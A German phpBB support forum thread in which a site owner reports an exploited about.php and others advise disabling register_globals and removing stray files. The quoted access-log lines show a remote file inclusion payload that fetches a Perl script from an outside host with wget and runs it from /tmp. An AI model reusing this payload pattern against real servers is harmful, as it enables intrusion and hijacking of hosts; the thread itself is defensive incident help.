Angriff auf about.php !

[qix100]

Hallo,

ich habe Heute von meine Provider folgenden Mail erhalten:

allem Anschein nach ist es Dritten gelungen, Ihre Webanwendung aufgrund
einer Sicherheitslücke für andere Zwecke zu missbrauchen.

Dateien:
/tmp/atrix_bnc.pl
/tmp/logs/
/tmp/yuha.pid
/tmp/users.db


Skript mit Sicherheitslücke:
./meinserver/phpBB2/about.php


Zugriffe:
---
201.4.233.137 - - [20/Jul/2006:21:32:33 +0200] "GET
/phpBB2/about.php?ws=http://www.mirai.mg.gov.br/dados/.uNfz/.xpl0itz/too
l25.dot?&cmd=cd%20/tmp;%20wget%20201.4.233.137/atrix_bnc.pl;%20ls
HTTP/1.1" 200 23895 www.meinserver.de "-" "Mozilla/4.0 (compatible; MSIE
6.0; Windows NT 5.1; SV1)" "-"
201.4.233.137 - - [20/Jul/2006:21:33:06 +0200] "GET
/phpBB2/about.php?ws=http://www.mirai.mg.gov.br/dados/.uNfz/.xpl0itz/too
l25.dot?&cmd=cd%20/tmp;perl%20atrix_bnc.pl%202525%20258456258456
HTTP/1.1" 200 23843 www.meinserver.de "-" "Mozilla/4.0 (compatible; MSIE
6.0; Windows NT 5.1; SV1)" "-"
201.4.233.137 - - [20/Jul/2006:21:33:33 +0200] "GET
/phpBB2/about.php?ws=http://www.mirai.mg.gov.br/dados/.uNfz/.xpl0itz/too
l25.dot?&cmd=cd%20/tmp;perl%20atrix_bnc.pl%202525%20258456258456
HTTP/1.1" 200 0 www.meinserver.de "-" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; SV1)" "-"
201.4.233.137 - - [20/Jul/2006:21:39:11 +0200] "GET
/phpBB2/about.php?ws=http://www.mirai.mg.gov.br/dados/.uNfz/.xpl0itz/too
l25.dot?&cmd=cd%20/tmp;perl%20atrix_bnc.pl%202525%20258456258456
HTTP/1.1" 200 24068 www.meinserver.de "-" "Mozilla/4.0 (compatible; MSIE
6.0; Windows NT 5.1; SV1)" "-"
---

Ich habe die aktuelle Version 2.0.21 installiert !?!
Gibts das wieder eine Sicherheitslücke ??

Gruß,
QIX100

[larsneo]

afaik hat das aktuelle phpbb2 keine about.php im root - da sie aber bei dir vorhanden ist und sicherheitslücken (remote code injection) aufweist - was steht denn da bei dir drin?

OT: /me fragt sich mal wieder, warum es heutzutage immer noch provider gibt, die per default register_globals=on setzen* - aus sicherheitsgründen wurde diese einstellung bereits im April 2002(!) in der PHP version 4.2.0 standardmäßig ausgestellt, in PHP 6 wird register_globals dann endgültig abgeschafft, thx god...
das darüberhinaus das tmp-verzeichnis die ausführung von perl-skripten ermöglicht ist sicherlich auch nicht wirklich gut durchdacht

* nachdem dein provider ja scheinbar gottvertrauen hat, solltest wenigstens du für deinen bereich die sicherheit ein wenig ernster nehmen und register_globals=off setzen, in aller regel hilft schon eine kleine .htaccess im root der präsenz:

Code: Alles auswählen

# set register_globals=off
php_flag register_globals off

kontrollieren kannst du die einstellung danach via phpinfo.php

Code: Alles auswählen

<?php
phpinfo();
?>

[qix100]

Hallo larsneo,

vielen Dank für deine Antwort.
Hmmm ... ich habe immer einfach die neuen Updates gemacht ... da stand aber nie was von Dateien löschen

Kann ich die about.php einfach löschen ??

Leider kann ich mit den Codeschnipseln nix anfangen, da ich mich damit nicht auskenne

Übrigens ist mein Provider "Schlund & Partner" !!

Hmmm, im Root steht auch noch eine upgrade.php , kann die auch weg ??

Gruß,
Frank

[larsneo]

1. was steht denn in der about.php drin (gerne auch via PM bzw. mail an larsneo AT postnuke DOT com)
2. die upgrade.php kannst/solltest du löschen (wenn überhaupt würde die eh' in den /install ordner gehören)

[qix100]

Mail ist unterwegs !!

[tomtom]

* nachdem dein provider ja scheinbar gottvertrauen hat, solltest wenigstens du für deinen bereich die sicherheit ein wenig ernster nehmen und register_globals=off setzen, in aller regel hilft schon eine kleine .htaccess im root der präsenz:

Code: Alles auswählen

# set register_globals=off
php_flag register_globals off

kontrollieren kannst du die einstellung danach via phpinfo.php

Code: Alles auswählen

<?php
phpinfo();
?>

Hi,

wenn ich eine .htaccess mit dem o.g. Inhalt in den Root lege, geht gar nix mehr:

ERROR 403: Zugriff verweigert
Es ist ein Fehler aufgetreten:

Der Zugriff auf die von Ihnen aufgerufenene URL wurde verweigert!

[larsneo]

falls die phpinfo.php anzeigt, dass register_globals bei dir aktiv ist, frage deinen provider wie du es (im hinblick auf deutlich bessere sicherheit) zumindestens für deinen bereich deaktivieren kannst.

[tomtom]

falls die phpinfo.php anzeigt, dass register_globals bei dir aktiv ist, frage deinen provider wie du es (im hinblick auf deutlich bessere
sicherheit) zumindestens für deinen bereich deaktivieren kannst.

Schon passier, nach Aussages des Supports nicht möglich. Stattdessen rät man mit zu einer php.ini im Root mit dem Inhalt

Code: Alles auswählen

php_admin_flag register_globals Off

Wie kann ich denn überprüfen, ob dieser Trick auch greift?

[larsneo]

natürlich mit der o.a. phpinfo.php - wobei sicherlich von interesse ist, ob das php.ini setting genauso wie die .htaccess geschichte rekursiv für die unterordner gilt - am besten auch in einem unterverzeichnis mittels phpinfo.php testen

[h-o]

wobei sicherlich von interesse ist, ob das php.ini setting genauso wie die .htaccess geschichte rekursiv für die unterordner gilt

Bei der php.ini gibt's normalerweise keine "Vererbung" für Unterordner, aber das ist bei Dateien, die beispielsweise im includes-Verzeichnis liegen, auch nicht erforderlich, da in diesem Fall die php.ini-Einstellung der aufrufenden Datei im Stammverzeichnis gilt (z. B. viewtopic.php).

Eine andere Geschichte ist es natürlich, wenn jemand die Dateien in /includes zum Cracken des Forums direkt aufruft. Aber die User hier sind ja alle sehr wachsam und haben dort bestimmt "if ( !defined('IN_PHPBB') )..." und dazu noch eine "Deny from All"-.htaccess eingebaut